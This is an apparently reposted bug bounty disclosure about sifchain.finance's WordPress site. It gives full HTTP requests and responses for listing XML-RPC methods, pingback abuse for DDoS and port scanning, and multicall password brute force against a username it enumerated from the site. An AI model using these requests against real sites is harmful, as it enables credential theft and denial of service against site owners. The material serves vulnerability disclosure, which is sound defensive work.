Site icon API Security Blog

Sifchain: xmlrpc.php And /wp-json/wp/v2/users FILE IS enable it will used for bruteforce attack and denial of service

Hi Team 🙂
i am abbas heybati 😉

## Summary:

After reviewing the given scope, I realized that the main domain “https://sifchain.finance” has several vulnerabilities that I will report to you as a scenario. I realize that I have reported to you outside of Scope. The report is related to the mentioned company and the vulnerability can endanger your business. I consider it my duty to report this vulnerability to you.

### the XML-RPC interface opens two kinds of attacks:

https://sifchain.finance/xmlrpc.php

* XML-RPC pingbacks
* Brute force attacks via XML-RPC

### And in the /wp-json/wp/v2/users path, it reveals all the user information

* https://sifchain.finance/wp-json/wp/v2/users

## Steps To Reproduce:

1. For the two vulnerabilities listed above in the xmlrpc.php section, first post a request to xmlrpc.php for ` system.listMethods ` given

### Post Request:

POST /xmlrpc.php HTTP/1.1
Host: sifchain.finance
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: __cfduid=dcb7a4e2b0f6a7042e39b0bd33aa4128a1617428272
Upgrade-Insecure-Requests: 1
Content-Length: 135

system.listMethods

### Response:

HTTP/1.1 200 OK
Date: Sat, 03 Apr 2021 05:49:32 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept-Encoding
X-hacker: If you’re reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Host-Header: WordPress.com
X-ac: 2.hhn _atomic_ams
CF-Cache-Status: DYNAMIC
cf-request-id: 0937e09a790000063171828000000001
Expect-CT: max-age=604800, report-uri=”https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct”
Server: cloudflare
CF-RAY: 63a003a3fc550631-FRA
Content-Length: 4653

system.multicallsystem.listMethodssystem.getCapabilitiesprli.api_versionprli.get_pretty_link_urlprli.get_link_from_slugprli.get_linkprli.get_all_linksprli.get_all_groupsprli.create_pretty_linkdemo.addTwoNumbersdemo.sayHellopingback.extensions.getPingbackspingback.pingmt.publishPostmt.getTrackbackPingsmt.supportedTextFiltersmt.supportedMethodsmt.setPostCategoriesmt.getPostCategoriesmt.getRecentPostTitlesmt.getCategoryListmetaWeblog.getUsersBlogsmetaWeblog.deletePostmetaWeblog.newMediaObjectmetaWeblog.getCategoriesmetaWeblog.getRecentPostsmetaWeblog.getPostmetaWeblog.editPostmetaWeblog.newPostblogger.deletePostblogger.editPostblogger.newPostblogger.getRecentPostsblogger.getPostblogger.getUserInfoblogger.getUsersBlogswp.restoreRevisionwp.getRevisionswp.getPostTypeswp.getPostTypewp.getPostFormatswp.getMediaLibrarywp.getMediaItemwp.getCommentStatusListwp.newCommentwp.editCommentwp.deleteCommentwp.getCommentswp.getCommentwp.setOptionswp.getOptionswp.getPageTemplateswp.getPageStatusListwp.getPostStatusListwp.getCommentCountwp.deleteFilewp.uploadFilewp.suggestCategorieswp.deleteCategorywp.newCategorywp.getTagswp.getCategorieswp.getAuthorswp.getPageListwp.editPagewp.deletePagewp.newPagewp.getPageswp.getPagewp.editProfilewp.getProfilewp.getUserswp.getUserwp.getTaxonomieswp.getTaxonomywp.getTermswp.getTermwp.deleteTermwp.editTermwp.newTermwp.getPostswp.getPostwp.deletePostwp.editPostwp.newPostwp.getUsersBlogs

2.XML-RPC pingbacks attacks

In this case, an attacker is able to leverage the default XML-RPC API in order to perform callbacks for the following purposes:

* Distributed denial-of-service (DDoS) attacks – An attacker executes the pingback.ping the method from several affected WordPress installations against a single unprotected target (botnet level).
* XSPA (Cross Site Port Attack) – An attacker can execute the pingback.ping the method from a single affected WordPress installation to the same host (or other internal/private host) on different ports. An open port or an internal host can be determined by observing the difference in time of response and/or by looking at the response of the request.

### Post Request:

POST /xmlrpc.php HTTP/1.1
Host: sifchain.finance
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: __cfduid=dcb7a4e2b0f6a7042e39b0bd33aa4128a1617428272
Upgrade-Insecure-Requests: 1
Content-Length: 285

pingback.pinghttps://your server target https://sifchain.finance

### Response:

HTTP/1.1 200 OK
Date: Sat, 03 Apr 2021 05:58:08 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept-Encoding
X-hacker: If you’re reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Host-Header: WordPress.com
X-ac: 2.hhn _atomic_ams
CF-Cache-Status: DYNAMIC
cf-request-id: 0937e87a5500002b4d4c323000000001
Expect-CT: max-age=604800, report-uri=”https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct”
Server: cloudflare
CF-RAY: 63a0103d5b352b4d-FRA
Content-Length: 394

faultCode0faultStringInvalid discovery target

3.Brute force attacks XML-RPC

Sometimes the only way to bypass request limiting or blocking in a brute force attack against WordPress site is to use the all too forgotten XML-RPC API.
In this section, we use the wp / v2 / users path that I mentioned at the beginning of the report.
Here we have found the users from the said path and use them in this section.(The user used in this section is asha8fd635db6e9, which is a report from the first section.)
“The above request can be sent in Burp Intruder (for example) with different sets of credentials. Note that, even if you guess the password or not, the response code will always be 200. “
“WordPress XML-RPC by default allows an attacker to perform a single request, and brute force hundreds of passwords.”

### Post Request:

POST /xmlrpc.php HTTP/1.1
Host: sifchain.finance
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: __cfduid=dcb7a4e2b0f6a7042e39b0bd33aa4128a1617428272
Upgrade-Insecure-Requests: 1
Content-Length: 243

wp.getUsersBlogsasha8fd635db6e9password

### Response:

HTTP/1.1 403 Forbidden
Date: Sat, 03 Apr 2021 05:51:33 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept-Encoding
X-hacker: If you’re reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Host-Header: WordPress.com
X-XMLRPC-Error-Code: 403
X-ac: 2.hhn _atomic_ams
CF-Cache-Status: DYNAMIC
cf-request-id: 0937e272350000dfb7e0b9c000000001
Expect-CT: max-age=604800, report-uri=”https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct”
Server: cloudflare
CF-RAY: 63a00696bd19dfb7-FRA
Content-Length: 403

faultCode403faultStringIncorrect username or password.

### The following request requires permissions for both system.multicall and wp.getUsersBlogs methods:

### Post Request:

POST /xmlrpc.php HTTP/1.1
Host: sifchain.finance
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: __cfduid=dcb7a4e2b0f6a7042e39b0bd33aa4128a1617428272
Upgrade-Insecure-Requests: 1
Content-Length: 1592

system.multicallmethodNamewp.getUsersBlogsparams{{ Your Username }}{{ Your Password }}methodNamewp.getUsersBlogsparams{{ Your Username }}{{ Your Password }}methodNamewp.getUsersBlogsparams{{ Your Username }}{{ Your Password }}methodNamewp.getUsersBlogsparams{{ Your Username }}{{ Your Password }}

### Response:

HTTP/1.1 200 OK
Date: Sat, 03 Apr 2021 09:47:13 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept-Encoding
X-hacker: If you’re reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Host-Header: WordPress.com
X-XMLRPC-Error-Code: 403
X-ac: 2.hhn _atomic_ams
CF-Cache-Status: DYNAMIC
cf-request-id: 0938ba358200004e9daebe8000000001
Expect-CT: max-age=604800, report-uri=”https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct”
Server: cloudflare
CF-RAY: 63a15fcf3b654e9d-FRA
Content-Length: 1043

faultCode403faultStringIncorrect username or password.faultCode403faultStringIncorrect username or password.faultCode403faultStringIncorrect username or password.faultCode403faultStringIncorrect username or password.

## Supporting Material/References:

1) https://nitesculucian.github.io/2019/07/01/exploiting-the-xmlrpc-php-on-all-wordpress-versions/
2) https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html
3) https://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html

### Reference Hackerone Reports: #325040 #448524 #448524 #752073

## Impact

1)This can be automated from multiple hosts and be used to cause a mass DDOS attack on the victim.
2) This method is also used for brute force attacks to stealing the admin credentials and other important credentials

Plus, there are a lot of PoCs lying around the web concerning the vulnerabilities associated with XMLRPC.php in wordpress websitesRead More

Exit mobile version